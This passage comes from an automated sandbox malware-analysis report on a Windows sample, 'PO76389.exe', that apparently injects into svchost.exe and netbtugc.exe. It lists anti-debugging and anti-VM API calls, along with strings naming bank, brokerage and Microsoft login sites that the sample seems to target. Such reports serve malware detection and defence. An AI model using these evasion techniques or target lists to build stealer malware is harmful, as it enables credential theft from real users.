            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0061C0D0 FindFirstFileW,FindNextFileW,FindClose,5_2_0061C0D0
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004CE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004CE47B
            Source: 1m0Sa73J8.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: TrBUxuahdhJ.exe, 00000007.00000002.4569048652.000000000127F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
            Source: 1m0Sa73J8.5.drBinary or memory string: discord.comVMware20,11696428655f
            Source: 1m0Sa73J8.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 1m0Sa73J8.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 1m0Sa73J8.5.drBinary or memory string: global block list test formVMware20,11696428655
            Source: 1m0Sa73J8.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 1m0Sa73J8.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 1m0Sa73J8.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 1m0Sa73J8.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: 1m0Sa73J8.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 1m0Sa73J8.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 1m0Sa73J8.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 1m0Sa73J8.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 1m0Sa73J8.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: firefox.exe, 00000008.00000002.2886232519.000002370796D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>>;
            Source: 1m0Sa73J8.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: 1m0Sa73J8.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 1m0Sa73J8.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: 1m0Sa73J8.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 1m0Sa73J8.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 1m0Sa73J8.5.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: 1m0Sa73J8.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: 1m0Sa73J8.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 1m0Sa73J8.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 1m0Sa73J8.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 1m0Sa73J8.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 1m0Sa73J8.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: 1m0Sa73J8.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: netbtugc.exe, 00000005.00000002.4568560118.000000000296E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9(
            Source: 1m0Sa73J8.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 1m0Sa73J8.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 1m0Sa73J8.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 1m0Sa73J8.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\PO76389.exeAPI call chain: ExitProcess graph end nodegraph_0-104331
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AD1C0 rdtsc 2_2_031AD1C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02537703 LdrLoadDll,2_2_02537703
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0050703C BlockInput,0_2_0050703C
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004B374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,0_2_004B374E
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004E46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_004E46D0
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_005EB090 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_005EB090
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_00DA1208 mov eax, dword ptr fs:[00000030h]0_2_00DA1208
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_00DA28E8 mov eax, dword ptr fs:[00000030h]0_2_00DA28E8
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_00DA2888 mov eax, dword ptr fs:[00000030h]0_2_00DA2888
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312C310 mov ecx, dword ptr fs:[00000030h]2_2_0312C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03150310 mov ecx, dword ptr fs:[00000030h]2_2_03150310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B930B mov eax, dword ptr fs:[00000030h]2_2_031B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B930B mov eax, dword ptr fs:[00000030h]2_2_031B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B930B mov eax, dword ptr fs:[00000030h]2_2_031B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A30B mov eax, dword ptr fs:[00000030h]2_2_0316A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A30B mov eax, dword ptr fs:[00000030h]2_2_0316A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A30B mov eax, dword ptr fs:[00000030h]2_2_0316A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03127330 mov eax, dword ptr fs:[00000030h]2_2_03127330
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F132D mov eax, dword ptr fs:[00000030h]2_2_031F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F132D mov eax, dword ptr fs:[00000030h]2_2_031F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315F32A mov eax, dword ptr fs:[00000030h]2_2_0315F32A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03129353 mov eax, dword ptr fs:[00000030h]2_2_03129353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03129353 mov eax, dword ptr fs:[00000030h]2_2_03129353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B035C mov eax, dword ptr fs:[00000030h]2_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B035C mov eax, dword ptr fs:[00000030h]2_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B035C mov eax, dword ptr fs:[00000030h]2_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B035C mov ecx, dword ptr fs:[00000030h]2_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B035C mov eax, dword ptr fs:[00000030h]2_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B035C mov eax, dword ptr fs:[00000030h]2_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FA352 mov eax, dword ptr fs:[00000030h]2_2_031FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312D34C mov eax, dword ptr fs:[00000030h]2_2_0312D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312D34C mov eax, dword ptr fs:[00000030h]2_2_0312D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03205341 mov eax, dword ptr fs:[00000030h]2_2_03205341
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D437C mov eax, dword ptr fs:[00000030h]2_2_031D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03137370 mov eax, dword ptr fs:[00000030h]2_2_03137370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03137370 mov eax, dword ptr fs:[00000030h]2_2_03137370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03137370 mov eax, dword ptr fs:[00000030h]2_2_03137370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EF367 mov eax, dword ptr fs:[00000030h]2_2_031EF367
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0318739A mov eax, dword ptr fs:[00000030h]2_2_0318739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0318739A mov eax, dword ptr fs:[00000030h]2_2_0318739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03128397 mov eax, dword ptr fs:[00000030h]2_2_03128397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03128397 mov eax, dword ptr fs:[00000030h]2_2_03128397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03128397 mov eax, dword ptr fs:[00000030h]2_2_03128397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312E388 mov eax, dword ptr fs:[00000030h]2_2_0312E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312E388 mov eax, dword ptr fs:[00000030h]2_2_0312E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312E388 mov eax, dword ptr fs:[00000030h]2_2_0312E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315438F mov eax, dword ptr fs:[00000030h]2_2_0315438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315438F mov eax, dword ptr fs:[00000030h]2_2_0315438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031533A5 mov eax, dword ptr fs:[00000030h]2_2_031533A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031633A0 mov eax, dword ptr fs:[00000030h]2_2_031633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031633A0 mov eax, dword ptr fs:[00000030h]2_2_031633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0320539D mov eax, dword ptr fs:[00000030h]2_2_0320539D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EB3D0 mov ecx, dword ptr fs:[00000030h]2_2_031EB3D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EC3CD mov eax, dword ptr fs:[00000030h]2_2_031EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]2_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]2_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]2_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]2_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]2_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]2_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031383C0 mov eax, dword ptr fs:[00000030h]2_2_031383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031383C0 mov eax, dword ptr fs:[00000030h]2_2_031383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031383C0 mov eax, dword ptr fs:[00000030h]2_2_031383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031383C0 mov eax, dword ptr fs:[00000030h]2_2_031383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B63C0 mov eax, dword ptr fs:[00000030h]2_2_031B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032053FC mov eax, dword ptr fs:[00000030h]2_2_032053FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E3F0 mov eax, dword ptr fs:[00000030h]2_2_0314E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E3F0 mov eax, dword ptr fs:[00000030h]2_2_0314E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E3F0 mov eax, dword ptr fs:[00000030h]2_2_0314E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031663FF mov eax, dword ptr fs:[00000030h]2_2_031663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EF3E6 mov eax, dword ptr fs:[00000030h]2_2_031EF3E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03205227 mov eax, dword ptr fs:[00000030h]2_2_03205227
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03167208 mov eax, dword ptr fs:[00000030h]2_2_03167208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03167208 mov eax, dword ptr fs:[00000030h]2_2_03167208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312823B mov eax, dword ptr fs:[00000030h]2_2_0312823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312A250 mov eax, dword ptr fs:[00000030h]2_2_0312A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EB256 mov eax, dword ptr fs:[00000030h]2_2_031EB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EB256 mov eax, dword ptr fs:[00000030h]2_2_031EB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136259 mov eax, dword ptr fs:[00000030h]2_2_03136259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BD250 mov ecx, dword ptr fs:[00000030h]2_2_031BD250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03129240 mov eax, dword ptr fs:[00000030h]2_2_03129240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03129240 mov eax, dword ptr fs:[00000030h]2_2_03129240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B8243 mov eax, dword ptr fs:[00000030h]2_2_031B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B8243 mov ecx, dword ptr fs:[00000030h]2_2_031B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316724D mov eax, dword ptr fs:[00000030h]2_2_0316724D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03159274 mov eax, dword ptr fs:[00000030h]2_2_03159274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03171270 mov eax, dword ptr fs:[00000030h]2_2_03171270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03171270 mov eax, dword ptr fs:[00000030h]2_2_03171270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03134260 mov eax, dword ptr fs:[00000030h]2_2_03134260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03134260 mov eax, dword ptr fs:[00000030h]2_2_03134260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03134260 mov eax, dword ptr fs:[00000030h]2_2_03134260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FD26B mov eax, dword ptr fs:[00000030h]2_2_031FD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FD26B mov eax, dword ptr fs:[00000030h]2_2_031FD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312826B mov eax, dword ptr fs:[00000030h]2_2_0312826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316329E mov eax, dword ptr fs:[00000030h]2_2_0316329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316329E mov eax, dword ptr fs:[00000030h]2_2_0316329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E284 mov eax, dword ptr fs:[00000030h]2_2_0316E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E284 mov eax, dword ptr fs:[00000030h]2_2_0316E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B0283 mov eax, dword ptr fs:[00000030h]2_2_031B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B0283 mov eax, dword ptr fs:[00000030h]2_2_031B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B0283 mov eax, dword ptr fs:[00000030h]2_2_031B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03205283 mov eax, dword ptr fs:[00000030h]2_2_03205283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B92BC mov eax, dword ptr fs:[00000030h]2_2_031B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B92BC mov eax, dword ptr fs:[00000030h]2_2_031B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B92BC mov ecx, dword ptr fs:[00000030h]2_2_031B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B92BC mov ecx, dword ptr fs:[00000030h]2_2_031B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031402A0 mov eax, dword ptr fs:[00000030h]2_2_031402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031402A0 mov eax, dword ptr fs:[00000030h]2_2_031402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031452A0 mov eax, dword ptr fs:[00000030h]2_2_031452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031452A0 mov eax, dword ptr fs:[00000030h]2_2_031452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031452A0 mov eax, dword ptr fs:[00000030h]2_2_031452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031452A0 mov eax, dword ptr fs:[00000030h]2_2_031452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F92A6 mov eax, dword ptr fs:[00000030h]2_2_031F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F92A6 mov eax, dword ptr fs:[00000030h]2_2_031F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F92A6 mov eax, dword ptr fs:[00000030h]2_2_031F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F92A6 mov eax, dword ptr fs:[00000030h]2_2_031F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]2_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov ecx, dword ptr fs:[00000030h]2_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]2_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]2_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]2_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]2_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C72A0 mov eax, dword ptr fs:[00000030h]2_2_031C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C72A0 mov eax, dword ptr fs:[00000030h]2_2_031C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312B2D3 mov eax, dword ptr fs:[00000030h]2_2_0312B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312B2D3 mov eax, dword ptr fs:[00000030h]2_2_0312B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312B2D3 mov eax, dword ptr fs:[00000030h]2_2_0312B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032052E2 mov eax, dword ptr fs:[00000030h]2_2_032052E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315F2D0 mov eax, dword ptr fs:[00000030h]2_2_0315F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315F2D0 mov eax, dword ptr fs:[00000030h]2_2_0315F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]2_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]2_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]2_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]2_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]2_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315B2C0 mov eax, dword ptr fs:[00000030h]2_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315B2C0 mov eax, dword ptr fs:[00000030h]2_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315B2C0 mov eax, dword ptr fs:[00000030h]2_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315B2C0 mov eax, dword ptr fs:[00000030h]2_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315B2C0 mov eax, dword ptr fs:[00000030h]2_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315B2C0 mov eax, dword ptr fs:[00000030h]2_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315B2C0 mov eax, dword ptr fs:[00000030h]2_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031392C5 mov eax, dword ptr fs:[00000030h]2_2_031392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031392C5 mov eax, dword ptr fs:[00000030h]2_2_031392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EF2F8 mov eax, dword ptr fs:[00000030h]2_2_031EF2F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031292FF mov eax, dword ptr fs:[00000030h]2_2_031292FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED mov eax, dword ptr fs:[00000030h]2_2_031E12ED
